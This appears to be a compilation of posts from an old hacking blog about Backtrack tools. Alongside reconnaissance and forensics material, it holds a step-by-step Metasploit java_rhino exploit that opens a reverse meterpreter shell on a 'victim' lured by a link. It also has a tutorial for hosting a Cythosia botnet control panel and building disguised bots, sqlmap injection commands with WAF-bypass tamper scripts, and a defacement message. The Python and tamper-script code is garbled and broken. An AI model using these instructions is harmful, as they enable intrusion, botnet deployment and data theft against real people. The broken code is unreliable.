Banner Grabbing - Backtrack

 Banner Grabbing - OS Detection 

OS Fingerprinting

After we know that the target machine is live, we can then find out the operating system used by the target machine. This method is commonly known as Operating System (OS) fingerprinting.So today i will teach you how you can find which operating system your target is using. 

XPROBE 2

xprobe2 is an OS fingerprinting tool. It fingerprints operating systems by using fuzzy signature matching, probabilistic guesses, multiple matches simultaneously, and a signature database. You need to run xprobe2 with root privileges as the xprobe2 uses a raw socket to send the probes.To access xprobe2:-

1. root@root# xprobe

//run it in ur console and it will open the xprobe usage on ur shell and u can also see which version ur using backtrack 5 r1 is using xprobe2////

Currently, xprobe2 has the following modules:

• icmp_ping: ICMP echo discovery module

• tcp_ping: TCP-based ping discovery module

• udp_ping: UDP-based ping discovery module

• ttl_calc: TCP and UDP based TTL distance calculation

• portscan: TCP and UDP PortScanner

• icmp_echo: ICMP echo request fingerprinting module

• icmp_tstamp: ICMP timestamp request fingerprinting module

• icmp_amask: ICMP address mask request fingerprinting module

• icmp_port_unreach: ICMP port unreachable fingerprinting module

• tcp_hshake: TCP Handshake fingerprinting module

• tcp_rst: TCP RST fingerprinting module

• smb: SMB fingerprinting module

• snmp: SNMPv2c fingerprinting module

For fingerprinting a remote machine, you can just call xprobe2 and give the remote machine IP address or hostname as the argument:

2. root@root# xprobe2 192.168.1.4 

Read more

Top FAMOUS HACKERS

FAMOUS HACKERS ALL TIMES

KEVIN MITNICK


BORN:- 6 AUGUST 1963 (LOS ANGELES) USA.

CURRENT OCCUPATION:- COMPUTER SECURITY CONSULTANT, AUTHOR.

WEBSITE:- www.kevinmitnick.com


LIFE SUMMARY :-He had a very unhappy childhood as his parents were divorced..He was a shy, lonely, overweight kid who was having problem making friends.His first illegal act was to bypass the punch card system, which allowed him to travel in any bus in LOS ANGELES for free.In high school he was introduced to phreaking, which is a way of studying experimenting and manipulating telecommunication systems, which he used for making free long distance calls.He gained his first unauthorized access in computer networks in 1979 at the age of 16 to the computer network of the company DIGITAL EQUIPMENT CORPORATION. Later he hacked into pacific bell voice mail computer which led to issue of a warrant for his arrest due to which he fled and become a fugitive for two and half year, during this years he broke into the computer networks of many reputed companies, using just a laptop and cloned cellular phone to hide his location, but he did a great  mistake of breaking into the computer of security expert tsutomu shimomura, who became determined to find the intruder. with the help of shimomura FBI arrested mitnick on February 15 1995 at an apartment in Raleigh, north Carolina. For his illegal computer exploits he served five years in prison and was released on January 21 2000. He know runs MITNICK SECURITY CONSULTING LLC a computer security consultancy.
Names of some famous computer networks hacked by Kevin Mitnick :- FBI, PENTAGON, NOKIA, MOTOROLA, SUN MICROSYSTEMS, FUJITSU SIEMENS.

BOOKS AUTHORED 
THE ART OF DECEPTION :- Download
THE ART OF INTRUSION  :- Download

A movie "takedown" was realesed on the chase of kevin mitnick which was based on the book "takedown" by  john markoff and tsutomu shimomura.



ADRIAN LAMO 

BORN:- 20 feb 1981 (Boston) USA.
NICKNAME:- "DOCTOR" and "HOMELESS HACKER".
CURRENT ACTIVITES:- THREAT ANALYST AND JOURNALIST.

ADRIAN LAMO popularly called "homeless hacker" for his transient lifestyle was a former grey hat hacker.He performed many authorized and unauthorized network vulnerability assessments for several high profile companies and firms.In 2003 he was arrested for hacking into the internal networks of "THE NEW YORK TIMES".Adrian Lamo's style was very different from that of other famous hackers. He did not like most expert hackers have any excellent programing skills or higher education,but his secret of success was his ability to get into the mindset of the architect of that security system and take advantage of mistakes done by them. Recently he was under much criticism from the hacker community for giving authorities information about Bradley Manning( US army soldier under arrest for allegedly leaking us cables to wikileaks).

Popular companies penetrated :- MICROSOFT, THE NEW YORK TIMES, YAHOO!, LEXIS-NEXIS, MCI WORLDCOM .




KEVIN POULSEN

Born:- 1965 (Pasadena, California)
Nickname:- "Dark Dante"
Current occupation:- Senior Editor at Wired news.

Website:- www.kevinpoulsen.com 
Blog:- Threat Level 

Kevin Poulsen is one of the most famous hackers in the world. His hacking career began at the age of 17 when he hacked into US Defence's ARPANET using his TRS-80 computer. He had a day job, first at Standford Research Institute ( SRI ) and then at Sun Microsystem. Hacking took place mainly during the night. During this days he carried out many high-tech stunts which made him one of the best known cyber criminals. In 1988 Kevin got in trouble with the FBI, when the authorities came to know that he had hacked the database on the federal investigation of Philippine dictator Ferdinand Marcos. FBI got a warrant issued against him, due which he fled underground and became a fugitive. During this run from the authorities he carried out his one of the most well known hack wherein he took over all telephone lines for Los Angeles Radio station KIIS-FM ensuring he would be the 102th caller and win the prize (a Porsche 944 S2). One more interesting incident was, when he was featured on NBS's Unsolved Mysteries. Dramatically when his photo was shown on the show, the show's 1-800 phone lines crashed. He was arrested in 1991 when supermarket employees recognized him. He plead guilty to 7 counts of  mail, computer and wire fraud, obstruction of justice, money laundering etc. He was sentenced to 51 months in prison and ordered to pay $56,000 in restitution.
  After being released he worked as a journalist in SecurityFocus, where he enjoyed considerably success in the job. Later he became the senior editor of WiredNews in June 2005 where now currently he is. A biography of Kevin "The Watchman: The Twisted Life and Crimes of Serial Hacker Kevin Poulsen" by Jon Littman was published. 
  In October 2006 he again came in lime-light when he released information about his successful search for sex-offenders using Myspace. His work identified 744 registered persons with MySpace profiles, and led to the arrest of one, Andrew Lubrano.

Note: Those are not the top most hackers . They are among the top famous Hackers.

Read more

Backtrack java rhino exploit

Browser Java Rhino exploit Tutorial

we are going to pwn windows 7 with a java exploit called: JAVA RHINO Exploit. Here i quote from the Armitage console's description of the exploit:" This module exploits a vulnerability in the Rhino Script Engine that can be used by Java Applet to run an arbitrary code outside of the sandbox" The vulnerability affects version 7 and earlier versions, and should work on any browser: firefox, safari, internet explorer, google chrome etc...
First of all, you have to update the metasploit svn by the custom command #msfupdate , to make sure that the above exploit is included in your Backtrack exploits database. Then run:

#msfconsole

Then use this exploit:

#use exploit/multi/browser/java_rhino

Next set payload:

#set payload/java/meterpreter/reverse/tcp

At this level, type these commands, the first one is meant to set up the server:

#set srvhost 192.168.1.6

In this case: 192.168.1.6 is my internal ip, you have to change this value with your own ip. If you don't know how to get your ip address, just open a ternimal and type: #ifconfig.The next command will define the port of the server which is usually port 80.

#set srvport 80

Next command is for setting up the path of the exploit:

#set uripath java_rhino

# set lhost 192.168.1.6

#set lport 443

Notice also that the srvhost & the lhost have the same ip address. Finally, type this command and wait for a connection:


#exploit

A link has been generated : Local IP://192.168.1.6:80/java_rhino, you have to copy the link and send it to your victim. Once you succeed in "social engineering" the link to a victim, the sending stage starts, and you'll have a java meterpreter session.

A meterpreter session will be created.
That's it Windows 7 is pwned  =)

Read more

Setup cythosia Bot

Tutorial to install cythosia Bot

Requirements:
- Cythosia bot,
- A web host on http://www.000webhost.com/ or any other web host but this one is for free.


First Step:
Login into your webhost account or register and get into your web host. The website takes you to a page where you have": List of your domains."
Click on go to cPanel of the domain you've just made.


Second Step:
Scroll down the new page that is open and click on "File Manager" in the " Files" section.
note: If the site asks for a login, enter the password of your account.
Having a new page open, Open the document called " public_html",
There, Click the upload button,
You'll be redirected to a page where is:
Files
Files entered here will be transferred to the FTP server.
And
Archives (zip, tar, tgz, gz)
Archives entered here will be decompressed, and the files inside will be transferred to the FTP server.
- Under the archives section, click " Choose File". and choose the " webPanel zip archive that just came after you've extracted the download one. After that click the "Check" above the : "Upload to directory" and wait a few seconds.


Third Step:
Return back to the first page of the File manager.
Now to configure the files you've just uploaded so the bot could work, you have to enter the webpanel folder on your webhost and click on Chmod after selecting all the files in it. You get redirected to : "Chmod directories and files" there change the Chmod value of the files to 777 and click the Check mark button.


Forth step:
Now you can exit the window your are in, and return to the members area: " Cpanel". There scroll down until you see : "» Software / Services", inside that section, click the one named after " MySQL ".
Create a new database with the username, database name and password you want, but keep them in your mind or save them somewhere.


Fifth Step:
Return back to the CPanel and click the " phpMyAdmin " in the same section as of the MySQL one. Press Enter phpMyAdmin to the database you've just created. A new window will open, in the one that just opened click, Import, the file that we must choose is the one named dump which is located in the Webpanel folder that you've extracted also in the beginning, select it and press " GO ". After doing that, you can now close that window.

Sixth Step:
Get Back to the Cpanel and press file manager again, Navigate to:
/public_html/Botnet/Webpanel/admin/inc
And Edit the config.php file, Edit it with the details of the Mysql Database, username and password you've just created.
Finally, save the file and exit the window.


Seventh Step:
Enter the domain of your webhost, you'll get to put a password, Type in " admin ".

*Creating a bot:
To create your bot just Open " CythBuilder " and change the " Domain " thing to your domain. After that you can change " 1.0.6 [beta] [23-03-2011]" to a name of your choice. And the " Drop Name.exe " to the file name you want to appear.

Extract the file you just downloaded to your desktop.

Download here

Read more

ANTI FORENSICS ~ Tool

DIGITAL ANTI FORENSICS

Digital Anti Forensics

Install truecrypt

This script is used to install Truecrypt, software that is used to create encrypted files using various encryption ciphers. It contains features such as hidden partitions inside the encyption file, as well as the ability to use files and text passwords as keys to the encryption file.

Download here

Digital Forensics

hexedit

hexedit is a program that gives the user the ability to view a file in hexadecimal and ASCII view. It offers the ability to read a device as a file. It includes build in key shortcuts to make it fast and easy to edit and analyze file, including skipping to specific memory locations, cutting and pasting, changing views, modes, and syntaxes similar to that of emacs.

Example usage: hexedit [filename]

Download here

Read more

RAM FORENSICS TOOLS - BACKTRACK

RAM FORENSICS TOOLS IN BACKTRACK

pdfbook.py

pdfbook.py is a utility that gathers information relating to Facebook from a process dump. On a Windows system, run “pd -p [pid] > file.dump” where [pid] is the process ID of a browser, then on a Linux system run “strings -el file.dump > fbookstrings”. Finally, we use pdfbook.py on the fbookstrings file resulting from the strings command.
Example Usage:pdfbook.py -f fbookstrings

pdgmail

pdgmail.py is a utility similar to pdfbook.py, but instead of gathering Facebook information from process dumps, it gathers Gmail information. On a Windows system, run “pd -p [pid] > file.dump” where [pid] is the process ID of a browser, then on a Linux system run “strings -el file.dump > gmailstrings”. Finally, we use pdgmail.py on the gmailstrings file resulting from the strings command.

Example Usage:pdgmail.py -f gmailstrings

PTK

PTK is a forensics toolkit, similar to the Sleuthkit toolkit. It contains built in modules in order to analyze nearly any type of media or filetype that may be encountered in a forensics investigation. It is browser based, and first needs to have a MySQL database configured. Leave all fields as default, and use the password “toor” for the root user in MySQL. It should setup successfully, at which point you need to register for the free version. Copy the license file you received into the config directory for PTK located at /var/www/ptk/config.

Next, log in as either admin or investigator, and open a new case. Fill out the necessary information, then add an image file to begin. It can even be a RAM dump. From here, the built in tools will help you pull information from the image(s).

Volatility

Volatility is a framework writen in Python that specializes in RAM analysis. The Volatility Framework can analyze volatile memory dumps from any system type, and can provide a deep insight into the state of the system while it was running. The Volatility Framework has been tested on Windows, OS X, Linux, and even Cygwin. In the example below, we use Volatility in order to list processes that were running on the system while the RAM image ram.img was taken.

Example Usage:volatility plist -f ram.img 

Read more

IF U R SEEING THIS 

==> THEN UR NETWORK IS HACKED <==

NO PROBLEM 

NOTHING CHANGED

@:DDR:@  @:SHAN@

Read more

Session hijacking methodes

Session hijacking methodes

When a user log in to the account  it starts a session with that account and this session ends up with log out  In a running session, user is give a session id which is unique identifier of the user for that session and is only valid for that session.It is the type of attack in which hacker gain access to the session id to gain unauthorized access to information or services in this maintain on cookies.Session hijacking is simple method to hack someone id hack like as a Facebook, g mail, Hotmail,twitter etc. Session hijacking is support on cookies...

Session hijacking can be done at 2 levels:

1. Network level (TCP and UDP session hijacking)
2. Application level (HTTP session hijacking)

Network level (TCP and UDP session hijacking)

     TCP session hijacking
TCP session hijacking is when a hacker takes over a TCP session between two machines. Since most authentication only occurs at the start of a TCP session, this allows the hacker to gain access to a machine. It can be done by following ways.

IP Spoofing: Assuming the identity
Man in the Middle attack using Packet Sniffers
Blind attacks which involves bruteforcing of session id.


     UDP session hijacking
It is similar to TCP session hijacking but easier than that because UDP does not use packet sequencing and synchronizing.

Hijacking Application Levels
In HTTP session hijacking hacker tries to get access to the session ID used in the session to identify the user. HTTP is state less so it need session ID with each request. If hacker get the session id, he can hijack the victim's session.

1. XSS
2. Man in the middle attack
3. Bruteforcing session id
4. Man in the browser attack

Read more

Netcraft Dns Search Engine

DNS Results From Netcraft Search Engine

The following python script is dedicated for CHC Members and it can obtain DNS results from netcraft search engine.This can be used in the information gathering stage of a penetration test.You can find the source code and a screenshot of the usage of this script below:


#!/usr/bin/python

import httplib

import re
import sys
import string
def help():
print "[netcraftdns v1.0] - by neuro [0x0lab.org]"
print "\nUsage: python netcraftdns.py <domain_name> \n"
sys.exit()
if len(sys.argv) < 1 or len(sys.argv) > 2:
help()
elif len(sys.argv) == 2:
domain_name =  sys.argv[1]
else:
help()

netcraftres=[]
totalnum=[]
def count(domain_name):
global nres
rg = httplib.HTTP('searchdns.netcraft.com')
rg.putrequest('GET', "/?restriction=site+ends+with&host=" + domain_name)
rg.putheader('Host', 'searchdns.netcraft.com')
rg.putheader('User-agent', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4')
rg.endheaders()
errcode, errmsg, headers = rg.getreply()
if errcode!=200:
print 'Error Sending Request', errcode, errmsg
else:
rgdata = rg.getfile().read()
searchres_pattern='Found [0-9]*'
sp = re.compile(searchres_pattern, re.I)
res=sp.findall(rgdata)
for total in res:
resclean=re.sub('Found ', '', total)
nres=resclean
print "[+]-Total Netcraft Results:", nres
def results(domain_name):
y=21
i=1
rg = httplib.HTTP('searchdns.netcraft.com')
rg.putrequest('GET', "/?restriction=site+ends+with&host=" + domain_name)
rg.putheader('Host', 'searchdns.netcraft.com')
rg.putheader('User-agent', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4')
rg.endheaders()
errcode, errmsg, headers = rg.getreply()
if errcode!=200:
print 'Error Sending Request', errcode, errmsg
else:
rgdata = rg.getfile().read()
pattern='[\w\.\-]+.'+domain_name
rgr = re.compile(pattern, re.I)
rgresults = rgr.findall(rgdata)
for netres in rgresults:
if netcraftres.count(netres) == 0:
netcraftres.append(netres)
print " |-", str(netres)
i=i+1
while y<nres:
if nres=="0":
break
rgi = httplib.HTTP('searchdns.netcraft.com')
rgi.putrequest('GET', "/?host=*."+domain_name+"&last="+netcraftres[-1]+"&from="+str(y)+"&restriction=site%20contains&position=")
rgi.putheader('Host', 'searchdns.netcraft.com')
rgi.putheader('User-agent', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4')
rgi.endheaders()
errcode, errmsg, headers = rgi.getreply()
if errcode!=200:
print 'Error Sending Request', errcode, errmsg
else:
rgdata1 = rgi.getfile().read()
pattern2='[\w\.\-]+.'+domain_name
rgr1 = re.compile(pattern2, re.I)
rgresults1 = rgr.findall(rgdata1)
if y > int(nres):
break
else:
y = y + 20
for netres1 in rgresults1:
if netcraftres.count(netres1) == 0:
netcraftres.append(netres1)
print " |-", str(netres1)
i=i+1
count(domain_name)
results(domain_name)


netcraftdns – Sample Results

Read more

Advance Sqlmap Commands

Advance Sqlmap tutorial

1.... When you have the target URL but you are not sure if any of the parameter in that request is vulnerable then sqlmap can act as scanner in that case. The syntax for the GET request is as follow ./sqlmap.py -u "http://www.site.com/oldman.php?id=5&text=dummy" The syntax for the POST request is as follow
./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" This will tell you whether any of the variable viz. id, text is vulnerable to sql injection or not.Note: Through out this tutorial we will take POST request as an example. The only difference in the syntax of GET and POST request is that POST request has an additional switch (--data) which has your post parameters and their values.

2.... When you doubt that a particular parameter might be vulnerable to sql injection then you can specify that parameter with -p switch. The syntax is as follows
./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" sqlmap will try to check if parameter "id" is injectable or not.

3.... If the instance described in the last scenarios (i.e. 1, 2) is only available after user authenticates with the application then the steps would be as follows,a) Login into your application.b) Note down all the cookie names and its values. Let us assume that the cookies generated are cookie1=dummy_val1, cookie2=dummy_val2.c) Use sqlmap --cookie switch to replay these cookies along with the sqlmap requests.So the syntax will be as follows
./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" --cookie="cookie1=dummy_val1;cookie2=dummy_val2"

4.... To get the value of the backend database such as version name, current database name and database user, the syntax will be
./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" -b --current-db --current-user

5.... To get the tables of dummydb database , the syntax will be ./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" --tables -D "dummydb"

6.... To get the columns of admin table, the syntax will be ./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" --columns -T "admin"

7.... When you know the backend database provider such as mssql, mysql, oracle, etc. then you can specify it with the --dbms switch. This will tell sqlmap to not to try queries related to other databases and in turn can speed up the injection process.
./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" -b --dbms="oracle"

8.... If the application is protected by web application firewall (w.a.f) then you can try various tamper scripts to bypass w.a.f detection. There are almost 30 such tamper scripts available. To specify one such tamper scripts, you can use --tamper switch. The syntax is ./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" -b --tamper="tamper_script1_name.py,tamper_script2_name.py" All the available tamper scripts can be found under the tamper directory inside sqlmap root directory.

9.... Writing your own Tamper script.There are certain cases when application has very weak detection signature but none of the tamper script can do the job. For example, if the application code detects "UNION SELECT" but not "UNION SELEcT" then sqlmap will not be able to injectthat target as all the payloads of sqlmap will be like "UNION ALL SELECT", "WAITFOR DELAY", etc.So let us create our own tamper script. The format of any tamper script will be as follow


# Needed imports
from lib.core.enums import PRIORITY

#Define which is the order of application of tamper scripts against the payload

__priority__ = PRIORITY.NORMAL

def tamper(payload):

''' Description of your tamper script

''' Description of your tamper script ''' Description of your tamper script '''

retVal = payload

# your code to tamper the original payload # return the tampered payload 

return retVal

Based on the above tamper script format, our script will be

#!/usr/bin/env python 
"""
Sample script by oldmanlab.
Email : oldmanlab@gmail.com
""" 
from lib.core.enums import PRIORITY __priority____priority__ = PRIORITY.NORMAL
def tamper(payload): 
""" INPUT : UNION ALL SELECT OUTPUT : UNION ALL SELEcT TESTED AGAINST: mysql 5.x.x """ 
INPUT    : UNION ALL SELECT 
OUTPUT : UNION ALL SELECT
TESTED AGAINST: mysql 5.x.x 
""" 
if payload: 
   retVal="" i=0 for i in xrange(len(payload)): 
if payload[i:i+10] == "ALL SELECT": 
  retVal +="ALL SELEcT" + payload[i+10:] 
break 
else: retval += payload[i] 
return retVal

Read more